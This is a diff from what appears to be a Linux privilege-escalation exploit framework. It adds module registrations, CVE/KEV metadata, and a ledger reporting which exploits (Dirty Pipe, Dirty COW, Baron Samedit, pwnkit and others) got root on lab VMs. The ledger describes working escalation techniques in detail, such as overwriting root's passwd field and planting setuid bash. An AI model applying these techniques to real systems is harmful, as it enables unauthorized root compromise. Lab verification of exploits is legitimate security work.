void skeletonkey_register_ghostlock(void);
|
||||
void skeletonkey_register_refluxfs(void);
|
||||
|
||||
/* Call every skeletonkey_register_<family>() above in canonical order.
|
||||
* Single source of truth so the main binary and the test binary stay
|
||||
|
||||
@@ -53,4 +53,9 @@ void skeletonkey_register_all_modules(void)
|
||||
skeletonkey_register_nft_pipapo();
|
||||
skeletonkey_register_ptrace_pidfd();
|
||||
skeletonkey_register_sudo_host();
|
||||
skeletonkey_register_cifswitch();
|
||||
skeletonkey_register_nft_catchall();
|
||||
skeletonkey_register_bad_epoll();
|
||||
skeletonkey_register_ghostlock();
|
||||
skeletonkey_register_refluxfs();
|
||||
}
|
||||
|
||||
@@ -296,6 +296,36 @@ const struct verification_record verifications[] = {
|
||||
.actual_detect = "VULNERABLE",
|
||||
.status = "match",
|
||||
},
|
||||
{
|
||||
.module = "refluxfs",
|
||||
.verified_at = "2026-07-23",
|
||||
.host_kernel = "5.14.0-687.10.1.el9_8.0.1.x86_64",
|
||||
.host_distro = "Rocky Linux 9.8 (Blue Onyx)",
|
||||
.vm_box = "rockylinux/9",
|
||||
.expect_detect = "VULNERABLE",
|
||||
.actual_detect = "VULNERABLE",
|
||||
.status = "match",
|
||||
},
|
||||
{
|
||||
.module = "dirty_cow",
|
||||
.verified_at = "2026-07-24",
|
||||
.host_kernel = "4.8.0-040800-generic",
|
||||
.host_distro = "Ubuntu 16.04.7 LTS",
|
||||
.vm_box = "ubuntu/xenial64+mainline-4.8.0",
|
||||
.expect_detect = "VULNERABLE",
|
||||
.actual_detect = "VULNERABLE",
|
||||
.status = "match",
|
||||
},
|
||||
{
|
||||
.module = "sudo_host",
|
||||
.verified_at = "2026-07-24",
|
||||
.host_kernel = "5.15.0-25-generic",
|
||||
.host_distro = "Ubuntu 22.04 LTS",
|
||||
.vm_box = "generic/ubuntu2204",
|
||||
.expect_detect = "VULNERABLE",
|
||||
.actual_detect = "VULNERABLE",
|
||||
.status = "match",
|
||||
},
|
||||
};
|
||||
|
||||
const size_t verifications_count =
|
||||
|
||||
+51
-6
@@ -122,8 +122,8 @@
|
||||
"cwe": "CWE-287",
|
||||
"attack_technique": "T1611",
|
||||
"attack_subtechnique": null,
|
||||
"in_kev": false,
|
||||
"kev_date_added": ""
|
||||
"in_kev": true,
|
||||
"kev_date_added": "2026-06-02"
|
||||
},
|
||||
{
|
||||
"cve": "CVE-2022-0847",
|
||||
@@ -251,6 +251,15 @@
|
||||
"in_kev": false,
|
||||
"kev_date_added": ""
|
||||
},
|
||||
{
|
||||
"cve": "CVE-2025-32462",
|
||||
"module_dir": "sudo_host_cve_2025_32462",
|
||||
"cwe": "CWE-863",
|
||||
"attack_technique": "T1068",
|
||||
"attack_subtechnique": null,
|
||||
"in_kev": false,
|
||||
"kev_date_added": ""
|
||||
},
|
||||
{
|
||||
"cve": "CVE-2025-32463",
|
||||
"module_dir": "sudo_chwoot_cve_2025_32463",
|
||||
@@ -269,6 +278,15 @@
|
||||
"in_kev": false,
|
||||
"kev_date_added": ""
|
||||
},
|
||||
{
|
||||
"cve": "CVE-2026-23111",
|
||||
"module_dir": "nft_catchall_cve_2026_23111",
|
||||
"cwe": "CWE-416",
|
||||
"attack_technique": "T1068",
|
||||
"attack_subtechnique": null,
|
||||
"in_kev": false,
|
||||
"kev_date_added": ""
|
||||
},
|
||||
{
|
||||
"cve": "CVE-2026-31635",
|
||||
"module_dir": "dirtydecrypt_cve_2026_31635",
|
||||
@@ -296,6 +314,33 @@
|
||||
"in_kev": false,
|
||||
"kev_date_added": ""
|
||||
},
|
||||
{
|
||||
"cve": "CVE-2026-43499",
|
||||
"module_dir": "ghostlock_cve_2026_43499",
|
||||
"cwe": "CWE-416",
|
||||
"attack_technique": "T1068",
|
||||
"attack_subtechnique": null,
|
||||
"in_kev": false,
|
||||
"kev_date_added": ""
|
||||
},
|
||||
{
|
||||
"cve": "CVE-2026-46242",
|
||||
"module_dir": "bad_epoll_cve_2026_46242",
|
||||
"cwe": "CWE-416",
|
||||
"attack_technique": "T1068",
|
||||
"attack_subtechnique": null,
|
||||
"in_kev": false,
|
||||
"kev_date_added": ""
|
||||
},
|
||||
{
|
||||
"cve": "CVE-2026-46243",
|
||||
"module_dir": "cifswitch_cve_2026_46243",
|
||||
"cwe": "CWE-20",
|
||||
"attack_technique": "T1068",
|
||||
"attack_subtechnique": null,
|
||||
"in_kev": false,
|
||||
"kev_date_added": ""
|
||||
},
|
||||
{
|
||||
"cve": "CVE-2026-46300",
|
||||
"module_dir": "fragnesia_cve_2026_46300",
|
||||
@@ -308,16 +353,16 @@
|
||||
{
|
||||
"cve": "CVE-2026-46333",
|
||||
"module_dir": "ptrace_pidfd_cve_2026_46333",
|
||||
"cwe": null,
|
||||
"cwe": "CWE-269",
|
||||
"attack_technique": "T1068",
|
||||
"attack_subtechnique": null,
|
||||
"in_kev": false,
|
||||
"kev_date_added": ""
|
||||
},
|
||||
{
|
||||
"cve": "CVE-2025-32462",
|
||||
"module_dir": "sudo_host_cve_2025_32462",
|
||||
"cwe": "CWE-863",
|
||||
"cve": "CVE-2026-64600",
|
||||
"module_dir": "refluxfs_cve_2026_64600",
|
||||
"cwe": null,
|
||||
"attack_technique": "T1068",
|
||||
"attack_subtechnique": null,
|
||||
"in_kev": false,
|
||||
|
||||
@@ -0,0 +1,278 @@
|
||||
# Exploit verification ledger
|
||||
|
||||
**What this is:** results of actually *running each exploit* against a genuinely
|
||||
vulnerable VM and confirming `uid=0` **out of band** (an independent root-owned
|
||||
write / `/etc/shadow` read / setuid-bash sentinel — never the module's own
|
||||
self-report). This is distinct from `docs/VERIFICATIONS.jsonl`'s historical
|
||||
records, which only checked that `detect()` returns the right verdict.
|
||||
|
||||
Harness: rootless qemu/KVM over frozen point-release cloud images (unpatched →
|
||||
vulnerable by default), driver in the session scratch dir. Root witnessed via
|
||||
`witness.sh` (shell-probe + setuid-bash finisher + module sentinels + `/etc/passwd`
|
||||
tamper check).
|
||||
|
||||
> **Headline finding:** the corpus was only ever *detect*-verified, never
|
||||
> *exploit*-verified. Running the exploits shows a mix of genuinely-working,
|
||||
> honestly-failing, and **falsely-succeeding** modules. Three modules reported
|
||||
> `EXPLOIT_OK` while obtaining **no root at all** (`pwnkit`, `ptrace_traceme`,
|
||||
> `dirty_pipe`) — a false positive from the dispatcher's "execve transferred →
|
||||
> clean child exit = OK" path (the exploit `execlp`'s a helper that then fails).
|
||||
> `dirty_pipe` additionally *corrupted the running system* (its unprivileged
|
||||
> `drop_caches` revert left /etc/passwd poisoned). All three are fixed below and
|
||||
> now either land real root or fail honestly.
|
||||
|
||||
## Confirmed landing root (uid=0 witnessed out of band)
|
||||
|
||||
| module | CVE | target | notes |
|
||||
|---|---|---|---|
|
||||
| `refluxfs` | CVE-2026-64600 | Rocky 9.8 / 5.14.0-687.el9 | full chain, `/etc/passwd` → root (earlier) |
|
||||
| `overlayfs` | CVE-2021-3493 | Ubuntu 20.04.0 / 5.4.0-26 | userns + xattr copy-up; **direct uid=0 witness** (cap'd payload drops a root-owned proof) |
|
||||
| `overlayfs_setuid` | CVE-2023-0386 | Ubuntu 22.04.0 / 5.15.0-25 | **after a full rewrite** — see below |
|
||||
| `pwnkit` | CVE-2021-4034 | Ubuntu 20.04.0 / polkit 0.105-26ubuntu1 | **after a fix** — see below |
|
||||
| `sudo_runas_neg1` | CVE-2019-14287 | Ubuntu 18.04.2 / sudo 1.8.21p2 + sudoers `(ALL,!root)` | `sudo -u#-1` → uid 0 |
|
||||
| `sudoedit_editor` | CVE-2023-22809 | Ubuntu 22.04.0 / sudo 1.9.9 + sudoers `sudoedit` grant | **after 2 fixes** — `chdir("/")` + helper basename match; `su skel` → uid 0 |
|
||||
| `sudo_host` | CVE-2025-32462 | Ubuntu 22.04.0 / sudo 1.9.9 + host-restricted sudoers rule | works as shipped; `sudo -h <host>` → uid 0 (needs a host-scoped rule + resolvable host) |
|
||||
| `ptrace_traceme` | CVE-2019-13272 | Ubuntu 18.04.0 / 4.15.0-50 + pkexec + active-session polkit | **after a full rewrite** — `skeletonkey --exploit ptrace_traceme` (uid 1000) → root-owned setuid bash. See below |
|
||||
| `sudo_samedit` | CVE-2021-3156 | Ubuntu 18.04.0 / sudo 1.8.21p2 / libc-2.27 | **after a full rewrite** — Baron Samedit; `skeletonkey --exploit sudo_samedit` (uid 1000, non-sudoer) → root-owned setuid bash. See below |
|
||||
| `dirty_pipe` | CVE-2022-0847 | mainline 5.16.0 on Ubuntu 22.04 userspace | **after fixing 3 bugs** — `skeletonkey --exploit dirty_pipe` (uid 1000) → root-owned setuid bash; /etc/passwd byte-identical after revert. See below |
|
||||
| `dirty_cow` | CVE-2016-5195 | mainline 4.8.0 on Ubuntu 16.04.7 | **after fixing the false-OK** — verbatim-module standalone (uid 1000) → root-owned setuid bash; /etc/passwd byte-identical after revert. See below |
|
||||
|
||||
## Fixed this session
|
||||
|
||||
- **`pwnkit`** — reported `EXPLOIT_OK` but did **not** root (glibc "Could not
|
||||
open converter … to PWNKIT"). Root cause: missing the `GCONV_PATH=.`
|
||||
re-injection directory + `chdir(workdir)`. Fixed → now lands real root on a
|
||||
vulnerable host. (commit `24b839e`)
|
||||
- **`ptrace_traceme`** (CVE-2019-13272) — first made **honest** (it had reported a
|
||||
false `EXPLOIT_OK` with a placeholder that had the mechanism *backwards* —
|
||||
attaching to the parent), then **rewritten and now lands real root** (uid=0
|
||||
witnessed out-of-band on Ubuntu 18.04.0 / 4.15.0-50). The correct mechanism is
|
||||
the reverse of the old placeholder: a *middle* process execs setuid `pkexec`
|
||||
(euid 0 for a window); its *child* spins until it sees that euid-0, calls
|
||||
`PTRACE_TRACEME` (recording the parent's **root** creds as its ptracer_cred —
|
||||
the bug), then execs `pkexec` itself — the traced setuid exec is **not
|
||||
degraded** because ptracer_cred is root, so the child becomes real root, and a
|
||||
staged `execveat()` self-re-exec injects the payload. Ported the proven Jann
|
||||
Horn / bcoles PoC verbatim (only `spawn_shell()` changed, to plant a root-owned
|
||||
proof + setuid bash), embedded as `ptrace_helper_src.h`, compiled on the target
|
||||
at runtime with unique `-DSK_PROOF/-DSK_ROOTBASH` paths, run, and verified by
|
||||
`stat()`-ing the root-owned artifacts. **Real-world precondition** (honestly
|
||||
reported): pkexec must *authorize* an auto-discovered `implicit-active=yes`
|
||||
helper, which needs an **active local session** (desktop) or an equivalently
|
||||
permissive polkit policy; over a bare *inactive* ssh session pkexec returns
|
||||
"Not authorized" and the module reports `EXPLOIT_FAIL` with that diagnosis. On
|
||||
the headless VM this was isolated with a permissive `pkla` for the backlight
|
||||
helper action — the kernel bug and the whole technique are confirmed; the gate
|
||||
is polkit, not the exploit.
|
||||
- **`overlayfs_setuid`** (CVE-2023-0386) — **rewritten and now lands real root**
|
||||
(uid=0 witnessed out-of-band on Ubuntu 22.04.0 / 5.15.0-25). The shipped
|
||||
module used a bogus `chown`-the-merged-view technique that never worked. The
|
||||
real bug needs a **FUSE lower layer** exporting a setuid-root file; overlay
|
||||
copy-up then materialises it in the real upper as a genuine setuid-root
|
||||
binary. Key findings from the port (all four were required):
|
||||
1. Overlay refuses a **userns-mounted** FUSE lowerdir (ENOSYS) — FUSE must
|
||||
be mounted in the **init ns** via the setuid `fusermount` helper (libfuse
|
||||
does this). A raw `/dev/fuse` server was tried and abandoned: its INIT
|
||||
handshake needs `poll()` on the non-blocking fd, and a malformed reply
|
||||
destabilised the kernel — fragile and inappropriate. libfuse is linked
|
||||
conditionally (pkg-config `fuse`/`fuse3`), matching `pack2theroot`.
|
||||
2. **fuse2** low-level API (`fuse_mount`/`fuse_new`/`fuse_loop_mt`, empty
|
||||
args) — `fuse_main` advertises splice/copy_file_range caps that make the
|
||||
kernel attempt `copy_file_range` at copy-up → ENOSYS with no fallback.
|
||||
3. **`read_buf`** callback (copy-up's splice read path).
|
||||
4. **`ioctl`** callback — copy-up issues `FS_IOC_GETFLAGS` on the lower; a
|
||||
server without an ioctl handler returns ENOSYS and copy-up fails. This
|
||||
was the last missing piece.
|
||||
Debugging was isolated by driving the exploit orchestration against the public
|
||||
PoC's `./fuse`, then swapping servers, then comparing `fops`.
|
||||
- **`sudo_samedit`** (CVE-2021-3156, "Baron Samedit") — the corpus's hardest
|
||||
userspace target, **rewritten and now lands real root** (uid=0 witnessed
|
||||
out-of-band on Ubuntu 18.04.0 / sudo 1.8.21p2 / libc-2.27, as an unprivileged
|
||||
non-sudoer). The shipped module drove a structural trigger with no offsets and
|
||||
honestly reported `EXPLOIT_FAIL`. Ported blasty's technique: the `sudoedit -s`
|
||||
unescape overflow overwrites a glibc NSS `service_user`, so the lookup dlopen's
|
||||
an attacker-planted `libnss_X/'P0P_SH3LLZ_ .so.2'` from CWD; its constructor
|
||||
runs while sudo is still root. The module compiles the NSS payload on the target
|
||||
(unique `-DSK_PROOF/-DSK_ROOTBASH`), lays out the `libnss_X/` dir, execs sudoedit
|
||||
with the crafted argv/env (per-libc grooming lengths: Ubuntu 56/54/63/212,
|
||||
Debian 64/49/60/214), and verifies root by `stat()`-ing the artifacts. Primary
|
||||
lengths landed first try; a `null_stomp_len` sweep (±8, the axis blasty's
|
||||
brute.sh perturbs) is the fallback for libc drift. Needs cc on the target.
|
||||
- **`dirty_pipe`** (CVE-2022-0847) — **three bugs fixed; now lands real root**
|
||||
(uid=0 witnessed out-of-band on a genuinely pre-fix **mainline 5.16.0** kernel —
|
||||
provisioned by installing the kernel.ubuntu.com 5.16.0 debs on the jammy image,
|
||||
since every cached cloud image was either pre-5.8 or backport-patched). The
|
||||
shipped exploit (1) flipped the *caller's* UID to `0000` and ran `su self`,
|
||||
which still demands the caller's password — it never rooted anything; (2)
|
||||
`execlp`'d su, so the dispatcher's exec-transfer path reported a **false
|
||||
`EXPLOIT_OK`** even on the auth failure; and (3) reverted with `drop_caches`,
|
||||
which needs root — so as an unprivileged caller it **left the running system's
|
||||
/etc/passwd page cache corrupted** (this actually broke sshd's user resolution
|
||||
in testing). Rewrote it to the reliable technique: overwrite **root's** password
|
||||
field with a known crypt hash, authenticate as root over a **pty** with the
|
||||
matching password (su reads the password from the controlling tty, not stdin),
|
||||
plant a root-owned proof + setuid bash, and **revert the page cache via the
|
||||
Dirty Pipe primitive itself** (write the saved original bytes back — no root, no
|
||||
drop_caches). Verified `/etc/passwd` is byte-identical afterward. Root judged
|
||||
only by the out-of-band artifact.
|
||||
- **`dirty_cow`** (CVE-2016-5195) — **same three bugs as `dirty_pipe`, fixed the
|
||||
same way** (found by the false-`EXPLOIT_OK` audit below). It raced the
|
||||
*caller's* UID field to `0000` then ran `su self` (needs the caller's password
|
||||
→ never rooted anything), `execlp`'d su so the exec-transfer path reported a
|
||||
**false `EXPLOIT_OK`**, and reverted with `drop_caches` (needs root → corrupts
|
||||
the running /etc/passwd). Rewrote to: race **root's** password field to a known
|
||||
`$6$` hash → authenticate as root over a pty → plant a root-owned proof + setuid
|
||||
bash → revert by racing the original bytes back through the Dirty COW primitive.
|
||||
Also fixed a latent buffer overflow (the success-check `readback[16]` was too
|
||||
small for a >16-byte payload), and made the `su`-over-pty step **poll for the
|
||||
prompt with a hard 20s cap** — a fixed-delay write raced su's prompt setup and
|
||||
**hung on xenial**, which (without the cap) would have blocked the revert and
|
||||
left /etc/passwd poisoned. The same robust `su` helper was back-ported to
|
||||
`dirty_pipe`. **Verified end-to-end on a genuinely Dirty-COW-vulnerable
|
||||
mainline 4.8.0 kernel** (provisioned by installing the kernel.ubuntu.com 4.8.0
|
||||
deb on a 16.04 image + a virtio-rng for entropy): a standalone built verbatim
|
||||
from the module's primitive + escalation + robust su raced root's passwd field,
|
||||
authenticated as root, planted a root-owned setuid bash, and left /etc/passwd
|
||||
byte-identical. (The full `skeletonkey` binary won't compile on xenial's 4.4-era
|
||||
uapi headers — several unrelated `nft_*` modules use newer kernel constants — so
|
||||
the verbatim standalone stands in for `--exploit dirty_cow` on that box.)
|
||||
- **`cgroup_release_agent`** — two real bugs fixed (commit `8c45b2b`): it read
|
||||
`getuid()` **after** `unshare(CLONE_NEWUSER)` (→ `65534`, so `uid_map` write
|
||||
was `"0 65534 1"` → EPERM), and it omitted `CLONE_NEWCGROUP` (→ cgroup-v1
|
||||
mount EPERM). Now the userns+cgroupns+mount setup is correct. It still can't
|
||||
root a **bare** unprivileged user on a stock systemd host: every v1 controller
|
||||
is pre-mounted (its `release_agent` is init-owned → EACCES from the userns)
|
||||
and a fresh named hierarchy is refused. Reachable in a **container** context
|
||||
(CAP_SYS_ADMIN / an ownable cgroup) — matches its "host root from rootless
|
||||
container" framing. The `getuid()`-after-`unshare` bug is a pattern to grep
|
||||
for across the other userns modules.
|
||||
|
||||
## False-`EXPLOIT_OK` audit (every module that transfers the process via `exec*`)
|
||||
|
||||
The dispatcher's `run_callback_isolated` forks the exploit and, if it `execve`s
|
||||
(FD_CLOEXEC closes the result pipe → parent reads EOF, no crash signal), reports
|
||||
`EXPLOIT_OK` **regardless of whether the exec'd program actually rooted anything**.
|
||||
So any exploit whose main path exec's a *not-guaranteed-root* target lies. Audited
|
||||
every `exec*`-calling module:
|
||||
|
||||
| module | verdict | why |
|
||||
|---|---|---|
|
||||
| `dirty_cow` | ❌ **false-OK → fixed + verified** | raced own UID + `su self`; `execlp(su)` transfer = OK. Fixed + verified end-to-end on mainline 4.8.0 (see above). |
|
||||
| `pwnkit` | ✅ fixed earlier | now re-injects gconv + verifies |
|
||||
| `ptrace_traceme` | ✅ fixed earlier | rewritten; verifies OOB artifact |
|
||||
| `dirty_pipe` | ✅ fixed earlier | rewritten; verifies OOB artifact |
|
||||
| `sudo_host` | ✅ safe | runs `sudo -n -h <host> id -u` witness (uid 0) *before* the exec |
|
||||
| `sudo_chwoot` | ✅ safe | forks sudo in a child, then `stat`s the setuid bash root-owned |
|
||||
| `cgroup_release_agent` | ✅ safe | polls for the root-owned setuid shell before exec |
|
||||
| `fuse_legacy` | ✅ honest | gates the exec on real `setuid(0)==0 && getuid()==0`; else `EXPLOIT_FAIL` |
|
||||
| `overlayfs` | ⚠️ proxy (low risk) | confirms the `security.capability` xattr persisted via `getxattr` before exec'ing the cap'd payload — strong proxy, works, but not a direct root witness |
|
||||
| `sudoedit_editor` | ⚠️ works, reporting unverified | plants a passwordless `skel:0:0` entry + `su skel` (confirmed to root), but returns `EXPLOIT_OK` unconditionally — would false-OK if su failed |
|
||||
| `dirtydecrypt`, `fragnesia`, `copy_fail_family` (`exploit_su.c`) | ✅ proxy-verified | exec the hijacked setuid target only after **verifying the shellcode/payload actually landed in the page cache** (`verify_plant` / `rc==1` / `WEXITSTATUS==0`) and reverting otherwise — a real effect-check, not a blind exec-transfer. 2026-target-gated. |
|
||||
| `ptrace_pidfd` | ✅ n/a | the `execve` is the *victim* being raced (fd-steal), not an escalation |
|
||||
| `mutagen_astronomy` | ✅ n/a | env-gated scaffold; SIGSEGVs by design |
|
||||
|
||||
Net: the exec-transfer trap produced **four** genuine false-OKs (`pwnkit`,
|
||||
`ptrace_traceme`, `dirty_pipe`, `dirty_cow`) — all now fixed and verified. The
|
||||
audit was then **broadened to every `EXPLOIT_OK` return site** (not just
|
||||
exec-transfer): the rest are backed by a genuine out-of-band check — a
|
||||
root-owned artifact `stat` (`sudo_chwoot`, `overlayfs`), a `getxattr`
|
||||
bug-signature, a `/etc/passwd` grep of the injected entry (`sudoedit_editor`,
|
||||
`refluxfs`), a real `setuid(0)==0` gate (`fuse_legacy`), or a page-cache
|
||||
`verify_plant` before the hijack exec (`copy_fail_family`, `dirtydecrypt`,
|
||||
`fragnesia`). **No further false-OKs remain.** `overlayfs` was additionally
|
||||
upgraded from its `getxattr` proxy to a **direct uid=0 witness** (the cap'd
|
||||
payload now drops a root-owned proof, re-verified on focal 5.4.0-26).
|
||||
|
||||
## Needs a faithful PoC port (genuinely vulnerable target, exploit doesn't land)
|
||||
|
||||
| module | CVE | target tested | what's wrong |
|
||||
|---|---|---|---|
|
||||
| `overlayfs_setuid` | CVE-2023-0386 | Ubuntu 22.04.0 / 5.15.0-25.25 | **Kernel confirmed vulnerable empirically** — the upstream PoC (xkaneiki, libfuse) pops root here (`uid=0(root)`, root-owned witness). The working technique: mount a FUSE fs exporting `/file` (st_uid=0, mode 04777) in the **init ns** via the setuid `fusermount3` helper, then overlay-in-userns with that FUSE lowerdir + copy-up. My module's non-FUSE `chown` variant yields `upper/file` uid=1000 (no escalation); mounting FUSE **inside** the userns → overlay `ENOSYS`. Attempted a self-contained **raw `/dev/fuse`** port: got the `fusermount` fd-passing handshake (`SCM_RIGHTS`) + mount working, but the server hits `EINVAL` on `read()` after `FUSE_INIT` (non-blocking fd → needs `poll()`), and even with poll/buffer fixes the raw server serving was flaky and repeatedly **wedged/rebooted the VM** — i.e. the raw protocol reimplementation is fragile and can destabilise the target, which is *worse* for the corpus than a lib dependency. **Conclusion: use libfuse** (proven, robust; matches the `pack2theroot` conditional-lib precedent). Port is scoped and ready; needs a clean session to implement + verify. |
|
||||
| *(none left in this table — `sudo_samedit` was the last, now working; see "Fixed this session")* | | | |
|
||||
|
||||
## Inconclusive (detect version-blind vs vendor backport)
|
||||
|
||||
*(none outstanding — `dirty_pipe` was here; now verified on a genuinely
|
||||
pre-fix mainline 5.16.0 kernel, see "Fixed this session".)*
|
||||
|
||||
## Kernel primitives — offset path fixed; `nf_tables` gap scoped (this session)
|
||||
|
||||
**Resolver bug fixed (`core/offsets.c`, commit `cd9bea6`).** The documented
|
||||
env-var offset override (`SKELETONKEY_MODPROBE_PATH` etc.) was **silently wiped on
|
||||
every default host**: `parse_symfile` reads `/proc/kallsyms`, which returns
|
||||
all-zero addresses under `kptr_restrict`, and then *unconditionally* zeroed
|
||||
`modprobe_path`/`init_task` — clobbering the values `apply_env` had just set. Net
|
||||
effect: every `--full-chain` primitive reported "offsets couldn't be resolved"
|
||||
even with correct offsets supplied. Now the all-zero path only clears fields it
|
||||
tagged `OFFSETS_FROM_KALLSYMS` itself. **This was the blocker for the entire
|
||||
primitive full-chain path.** Verified fixed on Ubuntu 22.04.0 / 5.15.0-25:
|
||||
`--full-chain` now prints `modprobe_path=0x… (env)`, the finisher engages, and the
|
||||
arb-write fires.
|
||||
|
||||
**`nf_tables` (CVE-2024-1086) — kernel CONFIRMED vulnerable; module gap scoped.**
|
||||
Followed the full methodology (test → confirm kernel → pull PoC → diff):
|
||||
- **Kernel is genuinely vulnerable.** Built Notselwyn's public universal PoC
|
||||
(`github.com/Notselwyn/CVE-2024-1086`, musl-static) on jammy 5.15.0-25 (below the
|
||||
patched branch 5.15.149) and ran it: it drove the exploit and hit the deliberate
|
||||
post-exploitation `kernel BUG at mm/slub.c:379` / `Kernel panic` — i.e. the
|
||||
cross-cache slab corruption fired. Kernel confirmed exploitable.
|
||||
- **The difference.** The module (its own header is honest about this) is a
|
||||
**trigger + groom scaffold**: it builds the `NFT_GOTO+NFT_DROP` verdict combo
|
||||
that `nft_verdict_init()` fails to reject, fires the double-free, and runs the
|
||||
`msg_msg` cg-96 groom — all real. But its arb-write is "FALLBACK-DEPTH": the
|
||||
exact `pipapo_elem` layout + value-pointer offset needed to redirect the write
|
||||
at `modprobe_path` is a documented TODO, so the write doesn't land → honest
|
||||
`EXPLOIT_FAIL`. Notselwyn's working exploit uses a *different, heavier* technique
|
||||
entirely — **universal cross-cache → dirty-pagetable** (arbitrary physical R/W,
|
||||
no per-kernel offsets), ~2000 LOC across multiple files with static
|
||||
`libnftnl`/`libmnl`.
|
||||
- **Scope of the remaining fix.** Making `nf_tables --full-chain` land root means
|
||||
either (a) completing the module's own per-kernel `pipapo_elem` arb-write layout,
|
||||
or (b) porting Notselwyn's universal technique. Both are substantial dedicated
|
||||
exploit-dev — this is the hardest module in the corpus, not a spot-the-bug fix.
|
||||
The offset resolver (above) is the piece that was actually broken and is now
|
||||
fixed + pushed.
|
||||
|
||||
- **Other 🟡 kernel primitives** (`nft_set_uaf`, `nft_payload`, `nft_fwd_dup`,
|
||||
`netfilter_xtcompat`, `af_packet`, `af_packet2`, `af_unix_gc`, `cls_route4`,
|
||||
`fuse_legacy`, `stackrot`, `sequoia`, `nft_pipapo`, `vsock_uaf`, `pintheft`):
|
||||
same shape — real trigger/groom scaffolds returning `EXPLOIT_FAIL` by design.
|
||||
The resolver fix unblocks feeding them offsets; each still needs its arb-write
|
||||
primitive completed against a matching vulnerable kernel.
|
||||
|
||||
**`netfilter_xtcompat` (CVE-2021-22555) — empirical note on why the primitives are
|
||||
hard.** Attempted the corpus's *most tractable* primitive first: it has a clean,
|
||||
well-regarded single-file public exploit (Andy Nguyen / Google, the `IPT_SO_SET_
|
||||
REPLACE` heap-OOB → `msg_msg` cross-cache → cred overwrite). Kernel confirmed
|
||||
vulnerable (Ubuntu 20.04 GA 5.4.0-26, and a provisioned mainline 5.8.0 — both pre
|
||||
the 5.4.0-77 / 5.8.0-53 fix). **But the reference exploit consistently fails at
|
||||
STAGE 1 ("could not corrupt any primary message") on both**, because it is tuned
|
||||
for *Ubuntu's exact `5.8.0-48-generic` config* (the tested target). The slab
|
||||
behaviour that governs whether the OOB write lands next to a sprayed `msg_msg`
|
||||
(freelist randomisation, memcg kmem accounting, SLUB merge) differs between
|
||||
mainline and Ubuntu-patched kernels, and Ubuntu's EOL `5.8.0-48` HWE debs are no
|
||||
longer readily sourceable. Takeaway: kernel primitives are **config-and-version-
|
||||
specific exploit-dev** — even a "drop-in" reference exploit needs its exact target
|
||||
kernel image plus per-target slab tuning, and then a full port (~760 LOC here,
|
||||
~2000 for `nf_tables`/Notselwyn). This is a per-primitive, multi-session effort;
|
||||
it is NOT the "spot the bug and fix it" tier the userspace modules were.
|
||||
- **Structural userspace** (`sudoedit_editor`, `sudo_chwoot`, `sudo_host`):
|
||||
need specific sudo versions + sudoers config; likely tractable.
|
||||
- **2026 CVEs** (`copy_fail` ×5, `dirtydecrypt`, `fragnesia`, `cifswitch`,
|
||||
`nft_catchall`, `ptrace_pidfd`): need vulnerable 2026 kernels; the reconstructed
|
||||
race triggers (`bad_epoll`, `ghostlock`, `nft_catchall`) are deliberately
|
||||
under-driven and won't pop root by design.
|
||||
- **Environment-blocked**: `vmwgfx` (VMware guest only), `dirty_cow` (needs ≤4.4),
|
||||
`mutagen_astronomy` (CentOS 6 / Debian 7).
|
||||
- **D-Bus/desktop** (`pack2theroot`, `udisks_libblockdev`): need the polkit/D-Bus
|
||||
stack + a provisioner rule.
|
||||
|
||||
## Method notes for continuation
|
||||
|
||||
- Frozen images: `cloud-images-archive.ubuntu.com/releases/<name>/release-<date>/`
|
||||
are unpatched and vulnerable-by-default for CVEs disclosed after that date — far
|
||||
easier than downgrading packages on current images.
|
||||
- gcc must be present *in* the VM (several exploits compile payloads at runtime);
|
||||
on EOL LTS, point apt at the archive main pocket.
|
||||
- **Always verify root out of band.** The module self-report is not trustworthy
|
||||
(two flagships lied). `witness.sh` is the reference check.
|
||||
@@ -4,7 +4,7 @@ Which SKELETONKEY modules cover CVEs that CISA has observed exploited
|
||||
in the wild per the Known Exploited Vulnerabilities catalog.
|
||||
Refreshed via `tools/refresh-cve-metadata.py`.
|
||||
|
||||
**12 of 34 modules cover KEV-listed CVEs.**
|
||||
**13 of 41 modules cover KEV-listed CVEs.**
|
||||
|
||||
## In KEV (prioritize patching)
|
||||
|
||||
@@ -22,6 +22,7 @@ Refreshed via `tools/refresh-cve-metadata.py`.
|
||||
| CVE-2025-32463 | 2025-09-29 | CWE-829 | `sudo_chwoot_cve_2025_32463` |
|
||||
| CVE-2021-22555 | 2025-10-06 | CWE-787 | `netfilter_xtcompat_cve_2021_22555` |
|
||||
| CVE-2018-14634 | 2026-01-26 | CWE-190 | `mutagen_astronomy_cve_2018_14634` |
|
||||
| CVE-2022-0492 | 2026-06-02 | CWE-287 | `cgroup_release_agent_cve_2022_0492` |
|
||||
|
||||
## Not in KEV
|
||||
|
||||
@@ -36,7 +37,6 @@ and are technically reachable. "Not in KEV" is not the same as
|
||||
| CVE-2020-14386 | CWE-250 | `af_packet2_cve_2020_14386` |
|
||||
| CVE-2020-29661 | CWE-416 | `tioscpgrp_cve_2020_29661` |
|
||||
| CVE-2021-33909 | CWE-190 | `sequoia_cve_2021_33909` |
|
||||
| CVE-2022-0492 | CWE-287 | `cgroup_release_agent_cve_2022_0492` |
|
||||
| CVE-2022-25636 | CWE-269 | `nft_fwd_dup_cve_2022_25636` |
|
||||
| CVE-2022-2588 | CWE-416 | `cls_route4_cve_2022_2588` |
|
||||
| CVE-2023-0179 | CWE-190 | `nft_payload_cve_2023_0179` |
|
||||
@@ -48,8 +48,15 @@ and are technically reachable. "Not in KEV" is not the same as
|
||||
| CVE-2023-4622 | CWE-416 | `af_unix_gc_cve_2023_4622` |
|
||||
| CVE-2024-26581 | ? | `nft_pipapo_cve_2024_26581` |
|
||||
| CVE-2024-50264 | CWE-416 | `vsock_uaf_cve_2024_50264` |
|
||||
| CVE-2025-32462 | CWE-863 | `sudo_host_cve_2025_32462` |
|
||||
| CVE-2025-6019 | CWE-250 | `udisks_libblockdev_cve_2025_6019` |
|
||||
| CVE-2026-23111 | CWE-416 | `nft_catchall_cve_2026_23111` |
|
||||
| CVE-2026-31635 | CWE-130 | `dirtydecrypt_cve_2026_31635` |
|
||||
| CVE-2026-41651 | CWE-367 | `pack2theroot_cve_2026_41651` |
|
||||
| CVE-2026-43494 | ? | `pintheft_cve_2026_43494` |
|
||||
| CVE-2026-43499 | CWE-416 | `ghostlock_cve_2026_43499` |
|
||||
| CVE-2026-46242 | CWE-416 | `bad_epoll_cve_2026_46242` |
|
||||
| CVE-2026-46243 | CWE-20 | `cifswitch_cve_2026_46243` |
|
||||
